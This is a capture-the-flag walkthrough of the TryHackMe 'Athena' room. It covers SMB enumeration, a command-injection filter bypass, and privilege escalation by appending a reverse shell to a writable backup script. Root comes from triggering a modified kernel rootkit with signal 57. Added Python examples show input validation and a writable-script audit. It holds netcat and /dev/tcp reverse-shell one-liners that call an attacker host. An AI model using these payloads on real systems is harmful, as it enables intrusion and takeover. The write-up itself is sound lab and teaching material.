Athena @ THM
Athena
Port Scan
Seeing that port 80 is open, I visited the web page.
I searched through it but found nothing, so I checked the SMB port.
smbclient -L //<ip>
smbclient //<ip>/public
Reading the msg_for_administrator.txt file.
Command Injection
So I visited the /myrouterpanel directory on the web server.
Seeing this, the first thing that came to mind was command injection.
I first checked whether the ping function was working.
Seeing that the ping works, I tried the payloads 127.0.0.1;ls and 127.0.0.1|ls, but they did not work.
After some tries I was able to bypass the filter with
$(command)
So, to get RCE, I used
$(nc <lhost> <lport> -e /bin/bash)
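As an added illustration, not code from the room or from this writeup, here is a constructed Python ping handler that shows why a separator blacklist like the one hit above does not stop $(command), beside a hardened version that validates the target as an IP address and never hands the input to a shell. The function names and the exact blacklist are assumptions.

```python
import ipaddress
import subprocess

# Constructed example, not the router panel's real code: a "ping" handler
# that relies on a separator blacklist, beside a hardened replacement.

# Assumed blacklist: what a naive filter that blocks ";" and "|" might use.
BLACKLIST = (";", "|", "&", "`")


def blacklist_allows(target: str) -> bool:
    """Weak check: true if none of the blacklisted characters appear.

    Command substitution written as $(...) contains none of them, so the
    shell still expands it when the string is run with shell=True.
    """
    return not any(ch in target for ch in BLACKLIST)


def vulnerable_command(target: str) -> str:
    """Builds the command the injectable handler would hand to
    subprocess.run(cmd, shell=True). Returned as a string here, never run."""
    if not blacklist_allows(target):
        raise ValueError("rejected by blacklist")
    return "ping -c 1 " + target


def validated_target(target: str) -> str:
    """Hardened check: accept only a syntactically valid IPv4/IPv6 address.
    ipaddress.ip_address raises ValueError for anything else, so trailing
    shell syntax can never reach a command."""
    return str(ipaddress.ip_address(target.strip()))


def safe_ping_argv(target: str) -> list:
    """Argument vector for the hardened handler. With shell=False each
    element is passed to ping verbatim; no shell parses the user input."""
    return ["ping", "-c", "1", validated_target(target)]


def safe_ping(target: str) -> int:
    """Runs the hardened ping and returns its exit status."""
    proc = subprocess.run(safe_ping_argv(target), check=False, capture_output=True)
    return proc.returncode


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "127.0.0.1;ls", "127.0.0.1$(id)"):
        weak = "passes" if blacklist_allows(candidate) else "blocked"
        try:
            validated_target(candidate)
            strong = "passes"
        except ValueError:
            strong = "blocked"
        print(f"{candidate!r:22} blacklist: {weak:8} ip validation: {strong}")
```

The point of the allow-list version is that it never tries to enumerate shell metacharacters; anything that is not an IP address is rejected, and the remaining value is passed as a single argv element rather than through a shell.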
I tried accessing the /home/athena directory but kept getting Permission denied.
Privilege escalation to athena
find / -user 'athena' 2>/dev/null
We see a /usr/share/backup directory with a backup.sh file in it.
Guessing that some process runs backup.sh, I decided to append a reverse shell to it:
echo 'bash -i >& /dev/tcp/<lhost>/4444 0>&1' >> backup.sh
Start a listener on port 4444.
After a while I got a reverse shell as athena.
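As an added check, not part of the original writeup, here is a Python audit that flags scripts writable by users other than their owner, which is the misconfiguration that makes the backup.sh trick above possible. The paths are constructed in a temporary directory; nothing here touches the real /usr/share/backup.

```python
import os
import stat
import tempfile

# Constructed example, not part of the room: flag scripts that a scheduled
# job runs but that accounts other than the owner can modify.


def other_writable(path: str) -> bool:
    """True if the group or world write bit is set. Either lets a
    low-privileged user append commands to a script another account runs."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_scripts(paths):
    """Return the subset of paths that exist and are writable by others."""
    return [p for p in paths if os.path.exists(p) and other_writable(p)]


def demo() -> tuple:
    """Creates two temporary scripts with different modes and reports which
    one the audit flags. Returns (flagged, clean) lists of paths."""
    workdir = tempfile.mkdtemp()
    loose = os.path.join(workdir, "backup.sh")      # assumed name, mirrors the room
    tight = os.path.join(workdir, "backup_fixed.sh")
    for p in (loose, tight):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\ntar czf /tmp/backup.tgz /home/athena\n")
    os.chmod(loose, 0o777)   # the misconfiguration: anyone can append to it
    os.chmod(tight, 0o755)   # owner-only write, which is what it should be
    flagged = risky_scripts([loose, tight])
    clean = [p for p in (loose, tight) if p not in flagged]
    return flagged, clean


if __name__ == "__main__":
    flagged, clean = demo()
    print("writable by others:", flagged)
    print("ok:", clean)
```

Running the same check over the scripts referenced from cron entries and systemd timers on a host is the defensive equivalent of the find command above: if the job runs as one user and the file is writable by another, whoever can write the file gets that user's shell.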
Root
Trying sudo -l,
we see that we can run: (root) NOPASSWD: /usr/sbin/insmod /mnt/.../secret/venom.ko
Use Ghidra to reverse the venom.ko file.
After some reversing, we notice the hacked_kill function:
We see that for give_root() to be called we need to send signal 57 instead of the 64 mentioned in the GitHub repository, so this rootkit was slightly modified. Let's try again with signal 57:
The give_root function should be triggered by kill -57.
So I started a process with sleep 10 &
got the process ID and typed kill -57 -<pid>
Now we got root!!!
